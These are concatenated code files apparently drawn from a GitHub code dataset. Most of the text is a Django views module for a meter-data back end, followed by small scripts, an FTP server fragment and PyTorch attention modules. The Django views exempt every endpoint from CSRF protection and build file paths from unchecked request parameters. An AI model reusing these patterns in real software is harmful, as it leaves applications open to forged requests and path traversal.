\n # print(frequencyGraphDataToSend)\n return HttpResponse(json.dumps(frequencyGraphDataToSend))\n############################## Create Fictitious Meter MWH #################################################################\n\n@csrf_exempt\ndef getFictMeterMWHData(request, meter_id): # Data of single meter\n\n print(\"inside getFictMeterMWHData\")\n print(meter_id)\n\n fictMeterMWHFiles = list(filter(lambda fictMeterMWHFile: (fictMeterMWHFile.fictMeterMWHFileMeterId() == meter_id),FictMeterMWHFile.objects.all()))\n # fictMeterMWHFile = fictMeterMWHFiles[0]\n # fictMwhDict = json.loads(fictMeterMWHFile.fictMwhDictionary)\n # print(fictMwhDict[\"1\"])\n fictMeterMWHFiles_json = serializers.serialize(\"json\", fictMeterMWHFiles , fields=('dirStructureFictMWH','meterFile'))\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(fictMeterMWHFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef fictMeterMWH(request,meter_id):\n # try :\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n createFictMeterMWH(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n return HttpResponse({'message': 'Fict Meter MWH Created'}, status=200)\n # except Exception as e :\n # return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n@csrf_exempt\ndef downloadFictMeterMWHFile(request,meter_id,fictMeterMWH_id): # Single File only\n\n print(\"inside downloadFictMeterMWHFile\")\n print(fictMeterMWH_id)\n # fictMeterMWHFile = FictMeterMWHFile.objects.get(id=int(fictMeterMWH_id))\n\n fictMeterMWHFiles = list(filter(lambda fictMeterMWHFile: (fictMeterMWHFile.fictMeterMWHFileMeterId() == meter_id),FictMeterMWHFile.objects.all()))\n fictMeterMWHFile = fictMeterMWHFiles[0]\n fictMwhDict = json.loads(fictMeterMWHFile.fictMwhDictionary)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,fictMwhDict[fictMeterMWH_id])\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(fictMwhDict[fictMeterMWH_id])\n return response\n\n return HttpResponse(\"There is no Fict Meter MWH File to download\")\n\n\n@csrf_exempt\ndef 
changeFictMeterMWHFile(request,meter_id,fictMeterMWH_id):\n\n print(\"inside changeFictMeterMWHFile\")\n print(fictMeterMWH_id)\n\n print(request.FILES['fileToUpload'])\n myfile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange = RealMeterMWHFile.objects.get(id = realMeterMWH_id)\n print(myfile)\n print(myfile.name)\n fictMeterMWHFiles = list(filter(lambda fictMeterMWHFile: (fictMeterMWHFile.fictMeterMWHFileMeterId() == meter_id),FictMeterMWHFile.objects.all()))\n fictMeterMWHFile = fictMeterMWHFiles[0]\n fictMwhDict = json.loads(fictMeterMWHFile.fictMwhDictionary)\n print(fictMwhDict[fictMeterMWH_id])\n # useThisLoc = 'fifteenmmdp/media'+fictMwhDict[fictMeterMWH_id]\n useThisLoc = fictMwhDict[fictMeterMWH_id]\n\n fs = OverwriteStorage()\n fs.save(useThisLoc, myfile)\n # realMeterMWHFileToChange.npcFile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange.save()\n return HttpResponse({'message': 'FictMeterMWHFile Changed'}, status=200)\n\ndef downLoadFullFictMeterMWHFiles(request,meter_id):\n print(\"inside downLoadFullFictMeterMWHFiles\")\n print(meter_id)\n\n path = os.path.join(settings.MEDIA_ROOT,'meterFile/meterFile'+meter_id)\n inputFile_path = os.path.join(path,'Fictitious Meter MWH Files')\n outputFile_path = os.path.join(path,'Fictitious_Meter_MWH.zip')\n\n shutil.make_archive(os.path.splitext(outputFile_path)[0], 'zip', inputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + 'Fictitious_Meter_MWH.zip'\n return response\n\n return HttpResponse(\"There is no Fictitious Meter MWH File to download\")\n\n############################## Create Final Output Files #################################################################\n\n\n@csrf_exempt\ndef getFinalOutputData(request, meter_id): # Data of single meter\n\n print(\"inside getFinalOutputData\")\n print(meter_id)\n\n finalOutputFiles = list(filter(lambda finalOutputFile: (finalOutputFile.finalOutputFileMeterId() == meter_id),FinalOutputFile.objects.all()))\n \n finalOutputFiles_json = serializers.serialize(\"json\", finalOutputFiles , fields=('dirStructureFinalOutput','meterFile'))\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(finalOutputFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef finalOutput(request,meter_id):\n try :\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n createFinalOutput(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n return HttpResponse({'message': 'Final Output Created'}, status=200)\n except Exception as e :\n return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n@csrf_exempt\ndef downloadFinalOutputFile(request,meter_id,finalOutput_id): # Single File only\n\n print(\"inside downloadFinalOutputile\")\n print(finalOutput_id)\n\n finalOutputFiles = list(filter(lambda finalOutputFile: (finalOutputFile.finalOutputFileMeterId() == meter_id),FinalOutputFile.objects.all()))\n finalOutputFile = finalOutputFiles[0]\n finalOutputDict = json.loads(finalOutputFile.finalOutputDictionary)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,finalOutputDict[finalOutput_id])\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), 
content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(finalOutputDict[finalOutput_id])\n return response\n\n return HttpResponse(\"There is no Final Output File to download\")\n\n\n@csrf_exempt\ndef changeFinalOutputFile(request,meter_id,finalOutput_id):\n\n print(\"inside changeFinalOutputFile\")\n print(finalOutput_id)\n\n print(request.FILES['fileToUpload'])\n myfile = request.FILES['fileToUpload']\n\n print(myfile)\n print(myfile.name)\n\n finalOutputFiles = list(filter(lambda finalOutputFile: (finalOutputFile.finalOutputFileMeterId() == meter_id),FinalOutputFile.objects.all()))\n finalOutputFile = finalOutputFiles[0]\n finalOutputDict = json.loads(finalOutputFile.finalOutputDictionary)\n print(finalOutputDict[finalOutput_id])\n # useThisLoc = 'fifteenmmdp/media'+finalOutputDict[finalOutput_id]\n useThisLoc = finalOutputDict[finalOutput_id]\n\n fs = OverwriteStorage()\n fs.save(useThisLoc, myfile)\n # realMeterMWHFileToChange.npcFile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange.save()\n return HttpResponse({'message': 'Final Output File Changed'}, status=200)\n\n@csrf_exempt\ndef downLoadFullFinalOutputFiles(request,meter_id):\n print(\"inside downLoadFullFinalOutputFiles\")\n print(meter_id)\n\n path = os.path.join(settings.MEDIA_ROOT,'meterFile/meterFile'+meter_id)\n inputFile_path = os.path.join(path,'Final Output Files')\n outputFile_path = os.path.join(path,'Final_Output.zip')\n\n shutil.make_archive(os.path.splitext(outputFile_path)[0], 'zip', inputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + 'Final_Output.zip'\n return response\n\n return HttpResponse(\"There is no Final Output File to download\")\n\n############################## Analyse data #################################################################\n@csrf_exempt\ndef analyseData(request,meter_id):\n try :\n print(\"Analyse data\")\n\n with open(\"fifteenmmdp/media/meterFile/meterFile\" + str(meter_id) +\"/NPC Files/Necessary Files Local Copy/GraphConfiguration.xlsx\", \"rb\") as f: # input the .xlsx\n data = pd.read_excel(f,sheet_name=None,engine='openpyxl')\n f.close()\n\n stateWiseFeederDetails = {}\n\n print(len(data.keys()))\n for key in data.keys() :\n data[key] = data[key].fillna(\"Meter not specified\")\n stateWiseFeederDetails[key] = []\n # print(data[key])\n\n # stateWiseFeederDetails = {'BIHAR' : [] , 'WEST BENGAL' : [] , 'GRIDCO' : [] , 'DVC' : [] , 'SIKKIM' : [] , 'JHARKHAND' : []}\n entities = stateWiseFeederDetails.keys()\n\n for entity in entities :\n for index, row in data[entity].iterrows():\n feederObject = {'id' : row['SL NO'] , 'Feeder Name' : row['Feeder Name'] , 'End1' : row['End1'], 'End2' : row['End2'] }\n stateWiseFeederDetails[entity].append(feederObject)\n \n # with open(r'fifteenmmdp/media/necessaryFiles/Graph Configuration.xlsx', \"rb\") as f: # input the .xlsx\n # data = pd.read_excel(f,sheet_name=\"WEST BENGAL\",engine='openpyxl')\n # f.close()\n # print(data)\n\n \n # for index, row in data.iterrows():\n # feederObject = {'id' : row['SL NO'] , 'Feeder Name' : row['Feeder Name'] , 'End1' : row['End1'], 'End2' : row['End2'] }\n # stateWiseFeederDetails['WEST BENGAL'].append(feederObject)\n\n # print(stateWiseFeederDetails)\n return HttpResponse(json.dumps(stateWiseFeederDetails), content_type=\"application/json\")\n\n # return 
HttpResponse({'message': 'ANALYSE DATA'}, status=200)\n except Exception as e :\n print(str(e))\n return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n@csrf_exempt\ndef fetchGraphData(request,meter_id,end1,end2,polarity):\n print(meter_id)\n print(end1)\n print(end2)\n print(polarity)\n graphData = fetchData(meter_id,end1,end2,polarity)\n return HttpResponse(json.dumps(graphData), content_type='application/json') \n\n@csrf_exempt\ndef fetchGraphDataExcel(request,meter_id,end1,end2,polarity):\n print(meter_id)\n print(end1)\n print(end2)\n print(polarity)\n graphData = fetchData(meter_id,end1,end2,polarity)\n # return HttpResponse(json.dumps(graphData), content_type='application/json')\n # graphData = {'end1Data' : end1Data ,'end2Data' : end2Data , 'xAxisData' : xAxisData , 'diff' : endDifference(end2Data,end1Data), 'diffPercentage' : endDifferencePercentage(end2Data,end1Data)}\n\n \n meterFileMainFolder = os.path.join(settings.MEDIA_ROOT,\"meterFile\",\"meterFile\"+meter_id)\n\n print(\"inside fetchGraphDataExcel\")\n\n graphDataExcel = {}\n\n graphDataExcel['Date'] = [item.split()[0] for item in graphData['xAxisData']]\n graphDataExcel['Timestamp'] = [item.split()[1] for item in graphData['xAxisData']]\n\n graphDataExcel[end1] = graphData['end1Data']\n graphDataExcel[end2] = graphData['end2Data']\n graphDataExcel['Difference'] = graphData['diff']\n graphDataExcel['Difference Percentage'] = graphData['diffPercentage']\n\n\n dfExcel = pd.DataFrame.from_dict(graphDataExcel)\n\n if(not os.path.exists(meterFileMainFolder + '/Pair Comparison')) :\n os.mkdir(meterFileMainFolder + '/Pair Comparison')\n\n outputFile_path = os.path.join(meterFileMainFolder,'Pair Comparison',end1 +\" vs \" + end2 +\".xlsx\")\n\n dfExcel.to_excel(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + end1 + \" vs \" + end2 +\".xlsx\"\n return response\n\n return HttpResponse(\"There is no File to download\")\n\n@csrf_exempt\ndef fetchMeterChangeLog(request,meter_id):\n print(meter_id)\n \n meterFileMainFolder = os.path.join(settings.MEDIA_ROOT,\"meterFile\",\"meterFile\"+meter_id)\n\n print(\"inside fetchMeterChangeLog\")\n \n outputFile_path = os.path.join(meterFileMainFolder,'ChangeLog.txt')\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type='application/text charset=utf-8')\n response['Content-Disposition'] = 'attachment; filename= \"ChangeLog.txt\"'\n return response\n\n return HttpResponse(\"No change has been done yet.\")\n\n\n\n@csrf_exempt\ndef fetchDateInfo(request,meter_id):\n print(\"this is fetchDateInfo\")\n print(meter_id)\n\n meterData = AllMeterFiles.objects.get(id=int(meter_id))\n\n # One day is substracted because Real Meter MWH Files only got created for these days.\n dateInformation = {'startDate' : str(meterData.startDate) , 'endDate' : str(meterData.endDate - timedelta(days=1))}\n \n return HttpResponse(json.dumps(dateInformation), content_type=\"text/json-comment-filtered\")\n\n@csrf_exempt\ndef zeroFillMeterEndData(request,meter_id):\n print(\"inside zeroFillMeterEndData\")\n\n meterEndToZeroFill = request.POST['meterEndToReplace']\n print(meterEndToZeroFill)\n print(meter_id)\n\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n\n zeroFillMeterError = 
zeroFillMeter(\"meterFile\"+meter_id ,meterFile ,meterEndToZeroFill)\n changeLog = \"Unavailable data for \" + meterEndToZeroFill + \" is filled with Zero\"\n\n meterChangeLog('fifteenmmdp\\media\\meterFile\\meterFile' + str(meter_id) + '\\ChangeLog.txt', changeLog)\n\n return HttpResponse(\"Success\")\n\n\n\n@csrf_exempt\ndef changeMeterEndData(request,meter_id):\n startDate = request.POST['startDate']\n endDate = request.POST['endDate']\n meterEndToReplace = request.POST['meterEndToReplace']\n equationToReplaceWith = request.POST['equationToReplaceWith']\n changeMeterError = changeMeterEndDataWithEquation(\"meterFile\"+meter_id ,startDate,endDate,meterEndToReplace,equationToReplaceWith)\n print(startDate)\n changeLog = meterEndToReplace + \" is replaced with \" + equationToReplaceWith + \" from timestamp \" + startDate + \" to timestamp \" + endDate\n\n meterChangeLog('fifteenmmdp\\media\\meterFile\\meterFile' + str(meter_id) + '\\ChangeLog.txt', changeLog)\n return HttpResponse(\"Success\")\n\n\n@csrf_exempt\ndef revertMeterEndData(request,meter_id):\n meterEndToReplace = request.POST['meterEndToReplace']\n print(meterEndToReplace)\n print(meter_id)\n print(\"inside revertMeterEndData\")\n revertMeterEndChangesError = revertMeterEndChanges(\"meterFile\"+meter_id ,meterEndToReplace)\n changeLog = \"All the changes done on \" + meterEndToReplace + \" has been Reverted Back.\"\n\n meterChangeLog('fifteenmmdp\\media\\meterFile\\meterFile' + str(meter_id) +'\\ChangeLog.txt', changeLog)\n return HttpResponse(\"Success\")\n\n@csrf_exempt\ndef componentWiseAnalysis(request,meter_id):\n meterEndToAnalyse = request.POST['meterEndToAnalyse']\n print(meterEndToAnalyse)\n print(meter_id)\n print(\"inside componentWiseAnalysis\")\n componentWiseGraphData = componentWiseMeterAnalysis(\"meterFile\"+meter_id ,meterEndToAnalyse)\n\n return HttpResponse(json.dumps(componentWiseGraphData), content_type='application/json')\n\n@csrf_exempt\ndef componentWiseExcelData(request,meter_id,meterEndToExcelData):\n \n meterFileMainFolder = os.path.join(settings.MEDIA_ROOT,\"meterFile\",\"meterFile\"+meter_id)\n\n # meterEndToExcelData = request.POST['meterEndToExcelData']\n print(meterEndToExcelData)\n print(meter_id)\n print(\"inside componentWiseAnalysis\")\n componentWiseGraphData = componentWiseMeterAnalysis(\"meterFile\"+meter_id ,meterEndToExcelData)\n\n downloadExcelData = {}\n\n downloadExcelData['Date'] = [item.split()[0] for item in componentWiseGraphData[0]['x']]\n downloadExcelData['Timestamp'] = [item.split()[1] for item in componentWiseGraphData[0]['x']]\n\n for componentData in componentWiseGraphData :\n downloadExcelData[componentData['name']] = componentData['y']\n\n dfExcel = pd.DataFrame.from_dict(downloadExcelData)\n\n if(not os.path.exists(meterFileMainFolder + '/Component-Wise Excel Data')) :\n os.mkdir(meterFileMainFolder + '/Component-Wise Excel Data')\n\n outputFile_path = os.path.join(meterFileMainFolder,'Component-Wise Excel Data',meterEndToExcelData+\".xlsx\")\n\n dfExcel.to_excel(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + meterEndToExcelData+\".xlsx\"\n return response\n\n return HttpResponse(\"There is no File to download\")\n\n############################## Special Reports #################################################################\n\n@csrf_exempt\ndef 
specialReports(request,meter_id):\n print(meter_id)\n print(\"inside specialReports\")\n threshold = request.POST['threshold']\n print(threshold)\n if(not isFloat(threshold)) :\n threshold = 0.5\n specialReport1Data = specialReport1(\"meterFile\"+meter_id,meter_id, float(threshold))\n\n return HttpResponse(json.dumps(specialReport1Data), content_type='application/json')\n\n############################## Necessary Files #################################################################\n\n@csrf_exempt\ndef getNecessaryFiles(request) :\n # necessaryFiles_json = serializers.serialize(\"json\", necessaryFiles)\n # return HttpResponse(json.dumps(necessaryFiles), content_type=\"application/json\")\n\n NecessaryFiles_json = serializers.serialize(\"json\", NecessaryFile.objects.all())\n\n return HttpResponse(NecessaryFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef downLoadNecessaryFile(request,necessaryFileId_id):\n print(\"inside downLoadNecessaryFile\")\n print(necessaryFileId_id)\n\n necessaryFile = NecessaryFile.objects.get(id=int(necessaryFileId_id))\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,necessaryFile.filePath)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"application/force-download\")\n response['Content-Disposition'] = 'attachment; filename=' + necessaryFile.fileName\n return response\n\n return HttpResponse(\"There is no File to download\")\n\n@csrf_exempt\ndef changeNecessaryFile(request,necessaryFileId_id):\n print(\"does work\")\n print(request.POST['subTitle'])\n print(request.POST['description'])\n print(request.FILES['necessaryFile'])\n necessaryFile = NecessaryFile.objects.get(id=int(necessaryFileId_id))\n necessaryFile.subTitle = request.POST['subTitle']\n necessaryFile.description = request.POST['description']\n necessaryFile.necessaryFile = request.FILES['necessaryFile']\n necessaryFile.save()\n return HttpResponse({'message': 'Necessary File updated '}, status=200)\n\n\n\n\n ","repo_name":"Pritam723/mdp-back-end","sub_path":"mdp/fifteenmmdp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":41075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38179541993","text":"import turtle\r\n\r\ntao = turtle.Pen()\r\ntao.shape('turtle')\r\nimport random\r\n\r\n\r\ndef color():\r\n C1 = ['red','orenge','yellow','green','blue','purple']\r\n C2 = random.choice(C1)\r\n tao.color(C2)\r\n\r\n \r\ndef go():\r\n tao.penup()\r\n x = random.randint(-150,150)\r\n y = random.randint(-150,150)\r\n tao.goto(x,y)\r\n tao.pendown()\r\n\r\n \r\ndef pen():\r\n for i in range(4):\r\n tao.forward(100)\r\n tao.left(90)\r\n\r\n \r\n\r\ndef all ():\r\n color()\r\n go()\r\n pen()\r\n\r\ntao.mainloop()","repo_name":"singkorn1189/Deang","sub_path":"turtle2.py","file_name":"turtle2.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38571294679","text":"class Solution:\n def numberOfSubarrays(self, nums: List[int], k: int) -> int:\n arr=[0]\n\n cnt=0\n n=len(nums)\n for i in range(n):\n nums[i]=nums[i]%2\n if nums[i]%2==1:\n arr.append(i)\n arr.append(n)\n \n print(arr)\n \n m=len(arr)\n for i in range(1,m-1):\n if i+k 1):\n print(args[1])\n else:\n print('Current dir')\n resp = self.dtp.listDir(self.dir + \"/\" + self.userName)\n \n if (not resp):\n reply = \"550 No files in directory\"\n 
self.sock.send(reply.encode())\n\n\n def quitProgram(self, args):\n self.active = False\n print(\"Closing connection with \" + self.address[0])\n reply = \"200 Closing connection\\r\\n\"\n self.sock.send(reply.encode())\n return\n\n def handleCommands(self):\n while(self.active):\n data = self.sock.recv(4096)\n decodeData = str(bytes.decode(data))\n clientComm = decodeData.lower()\n clientComm = clientComm.split()\n\n try:\n print(clientComm)\n self.com[clientComm[0]](clientComm)\n except:\n reply = \"500 Command not recognised\\r\\n\"\n self.sock.send(reply.encode())\n\n return\n\nclass serverPi():\n def __init__(self):\n self.port = 21 \n self.address = \"localhost\"\n self.sock = None\n\n signal.signal(signal.SIGINT, self.exitHandler)\n\n def exitHandler(self, sig, frame):\n print(\"\\nServer stopping...\")\n if (self.sock):\n self.sock.close()\n sys.exit(0)\n return\n\n\n def listen(self):\n print(\"Server starting...\")\n\n try:\n self.sock = socket.socket()\n self.sock.bind((self.address, self.port))\n\n print(\"Server started on port: \" + str(self.port))\n\n self.sock.listen()\n\n threads = []\n threadCount = -1\n except:\n print(\"Error: Could not create socket to listen for connections\")\n\n while (True and self.sock) :\n\n clientSock, clientAddress = self.sock.accept()\n\n if clientSock:\n # new thread for this client\n threads.append(serverPiThread(clientSock, clientAddress))\n threadCount += 1\n threads[threadCount].start()\n \n print(\"Server stopping...\")\n\n if self.sock:\n self.sock.close()\n\n return\n\n\n def user(self):\n print(\"worked\")\n pass\n","repo_name":"RC-7/FTP","sub_path":"serverPi.py","file_name":"serverPi.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40195207334","text":"from Downloader import Downloader\nfrom Builder import Builder\nfrom Utils import loadconfig\nfrom Controller import Controller\n\n\n\n\n\nif __name__ == '__main__':\n# -----------------load config--------------------\n configpath = \"Config/config.json\"\n configs = loadconfig(configpath)\n dir_config = configs[\"Dir\"]\n file_config = configs[\"File\"]\n# -----------------create classes--------------\n builder = Builder(configpath)\n downloader = Downloader(dir_config[\"Save_Path\"])\n controller = Controller(file_config[\"MusicList\"])\n# ------------------------------------------\n controller = controller.init(downloader,builder)\n controller.AutoDownload()","repo_name":"ctlyz123/MusicDownload","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10492227334","text":"class Solution:\n # Time: O(n^2)\n # Space: O(1)\n def maxProfit(self, prices: List[int]) -> int:\n max_profit = 0\n for i in range(len(prices)):\n for j in range(i + 1, len(prices)):\n buy = prices[i]\n sell = prices[j]\n max_profit = max(max_profit, sell - buy)\n return max_profit\n\n # Time: O(n) \n # Space: O(1)\n def maxProfit(self, prices: List[int]) -> int:\n profit = 0\n min_price = prices[0]\n for i in range(1, len(prices)):\n profit = max(profit, prices[i] - min_price)\n min_price = min(min_price, prices[i])\n return 
profit\n","repo_name":"ThinkSmall98/Neetcode_150_Python_Solutions_Personal","sub_path":"sliding_window/best_time_to_buy&sell_stock.py","file_name":"best_time_to_buy&sell_stock.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8992006347","text":"#Basic Modules\n\n#Pytorch\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\n\n\nclass SE(nn.Module):\n def __init__(self, in_channels, reduction_ratio):\n super().__init__()\n self.pool = nn.AdaptiveAvgPool2d(1)\n self.fc1 = nn.Linear(in_channels, in_channels//reduction_ratio, bias = True)\n self.relu = nn.ReLU(inplace = True)\n self.fc2 = nn.Linear(in_channels//reduction_ratio, in_channels, bias = True)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n b, c, _, _ = x.size()\n out = self.pool(x).view(b, c)\n out = self.fc1(out)\n out = self.relu(out)\n out = self.fc2(out)\n out = self.sigmoid(out).view(b, c, 1, 1)\n return x * out.expand_as(x)\n\nclass SRM(nn.Module):\n def __init__(self, in_channels):\n super().__init__()\n self.cfc = Parameter(torch.Tensor(in_channels, 2))\n self.cfc.data.fill_(0)\n self.bn = nn.BatchNorm2d(in_channels)\n self.activation = nn.Sigmoid()\n\n def _style_pooling(self, x, eps=1e-5):\n N, C, _, _ = x.size()\n channel_mean = x.view(N, C, -1).mean(dim=2, keepdim=True)\n channel_var = x.view(N, C, -1).var(dim=2, keepdim=True) + eps\n channel_std = channel_var.sqrt()\n t = torch.cat((channel_mean, channel_std), dim=2)\n return t \n \n def _style_integration(self, t):\n z = t * self.cfc[None, :, :] \n z = torch.sum(z, dim=2)[:, :, None, None] \n z_hat = self.bn(z)\n g = self.activation(z_hat)\n return g\n\n def forward(self, x):\n t = self._style_pooling(x)\n g = self._style_integration(t)\n return x * g\n\nclass BAM(nn.Module):\n def __init__(self, in_channels, reduction_ratio = 4):\n super().__init__()\n #Channel Attention\n self.c_pool = nn.AdaptiveAvgPool2d(1)\n self.c_fc1 = nn.Linear(in_channels, in_channels // reduction_ratio, bias = True)\n self.c_fc2 = nn.Linear(in_channels // reduction_ratio, in_channels, bias = True)\n self.c_bn = nn.BatchNorm2d(in_channels)\n\n #Spatial Attention\n self.s_conv1 = nn.Conv2d(in_channels, in_channels // reduction_ratio, kernel_size = 1)\n self.s_bn1 = nn.BatchNorm2d(in_channels // reduction_ratio)\n self.s_relu1 = nn.ReLU()\n self.s_conv2 = nn.Conv2d(in_channels // reduction_ratio, in_channels // reduction_ratio, kernel_size = 3, padding = 4, dilation = 4)\n self.s_bn2 = nn.BatchNorm2d(in_channels // reduction_ratio)\n self.s_relu2 = nn.ReLU() \n self.s_conv3 = nn.Conv2d(in_channels // reduction_ratio, in_channels // reduction_ratio, kernel_size = 3, padding = 4, dilation = 4)\n self.s_bn3 = nn.BatchNorm2d(in_channels // reduction_ratio)\n self.s_relu3 = nn.ReLU()\n self.s_conv4 = nn.Conv2d(in_channels // reduction_ratio, 1, kernel_size = 1)\n\n #Combine\n self.sigmoid = nn.Sigmoid()\n\n def channel_attention(self, x):\n b, c, _, _ = x.size()\n out = self.c_pool(x).view(b, c)\n out = self.c_fc1(out)\n out = self.c_fc2(out).view(b, c, 1, 1)\n out = self.c_bn(out)\n return out\n \n def spatial_attention(self, x):\n out = self.s_conv1(x)\n out = self.s_bn1(out)\n out = self.s_relu1(out)\n out = self.s_conv2(out)\n out = self.s_bn2(out)\n out = self.s_relu2(out)\n out = self.s_conv3(out)\n out = self.s_bn3(out)\n out = self.s_relu3(out)\n out = self.s_conv4(out)\n return out\n \n def forward(self, x):\n m_c = 
self.channel_attention(x)\n m_s = self.spatial_attention(x)\n out = self.sigmoid(m_c * m_s)\n return x * out\n\nclass CBAM(nn.Module):\n def __init__(self, in_channels, reduction_ratio = 4):\n super().__init__()\n\n #Channel Attention(MaxPool)\n self.c_pool1 = nn.AdaptiveAvgPool2d(1)\n self.c_fc1 = nn.Linear(in_channels, in_channels // reduction_ratio, bias = True)\n self.c_relu1 = nn.ReLU()\n self.c_fc2 = nn.Linear(in_channels // reduction_ratio, in_channels, bias = True)\n\n #Channel Attention(AvgPool)\n self.c_pool2 = nn.AdaptiveMaxPool2d(1)\n self.c_fc3 = nn.Linear(in_channels, in_channels // reduction_ratio, bias = True)\n self.c_relu2 = nn.ReLU()\n self.c_fc4 = nn.Linear(in_channels // reduction_ratio, in_channels, bias = True)\n\n #Combine\n self.c_sigmoid1 = nn.Sigmoid()\n\n #Spatial Attention\n self.s_conv1 = nn.Conv2d(2, 1, kernel_size = 7, stride = 1, padding = 3)\n self.s_bn1 = nn.BatchNorm2d(1)\n self.s_sigmoid2 = nn.Sigmoid()\n \n def forward(self, x):\n b, c, _, _ = x.size()\n\n out_max = self.c_pool1(x).view(b, c)\n out_max = self.c_fc1(out_max)\n out_max = self.c_relu1(out_max)\n out_max = self.c_fc2(out_max).view(b, c, 1, 1)\n\n out_avg = self.c_pool2(x).view(b, c)\n out_avg = self.c_fc3(out_avg)\n out_avg = self.c_relu2(out_avg)\n out_avg = self.c_fc4(out_avg).view(b, c, 1, 1)\n\n out_channel = self.c_sigmoid1(out_max + out_avg)\n out_channel = x * out_channel\n\n out_spatial = torch.cat((torch.max(out_channel,1)[0].unsqueeze(1), torch.mean(out_channel,1).unsqueeze(1)), dim=1)\n out_spatial = self.s_conv1(out_spatial)\n out_spatial = self.s_bn1(out_spatial)\n out_spatial = self.s_sigmoid2(out_spatial)\n out_spatial = out_channel * out_spatial\n return out_spatial\n \nclass GE(nn.Module):\n def __init__(self, in_channels, location):\n super().__init__()\n kernel_size = [56, 28, 14, 7]\n self.conv = nn.Conv2d(in_channels, in_channels, kernel_size = kernel_size[location], groups = in_channels)\n self.bn = nn.BatchNorm2d(in_channels)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n b, c, _, _ = x.size()\n out = self.conv(x)\n out = self.bn(out)\n out = self.sigmoid(out)\n return x * out\n\nclass SepConv(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size):\n super().__init__()\n self.conv1 = nn.Conv2d(in_channels, in_channels, kernel_size = kernel_size, stride = 1, padding = 1, groups = in_channels, bias = False)\n self.bn1 = nn.BatchNorm2d(in_channels, eps = 1e-05, momentum = 0.01)\n self.relu1 = nn.ReLU(inplace = True)\n self.conv2 = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = 1, bias = False)\n self.bn2 = nn.BatchNorm2d(out_channels, eps = 1e-05, momentum = 0.01)\n\n def forward(self, x):\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu1(out)\n out = self.conv2(out)\n out = self.bn2(out)\n return out\n\nclass MBConv(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding, expansion_ratio, residual = True, attention = None):\n super().__init__()\n self.attention = attention\n self.residual = residual\n expanded_channels = in_channels * expansion_ratio\n if self.residual == True:\n self.residual = nn.Conv2d(in_channels, out_channels, kernel_size = 1, stride = stride, bias = False)\n self.conv1 = nn.Conv2d(in_channels, expanded_channels, kernel_size = 1, stride = 1, bias = False)\n self.bn1 = nn.BatchNorm2d(expanded_channels, eps = 1e-05, momentum = 0.01)\n self.relu1 = nn.ReLU()\n self.conv2 = nn.Conv2d(expanded_channels, expanded_channels, kernel_size = kernel_size, stride = 
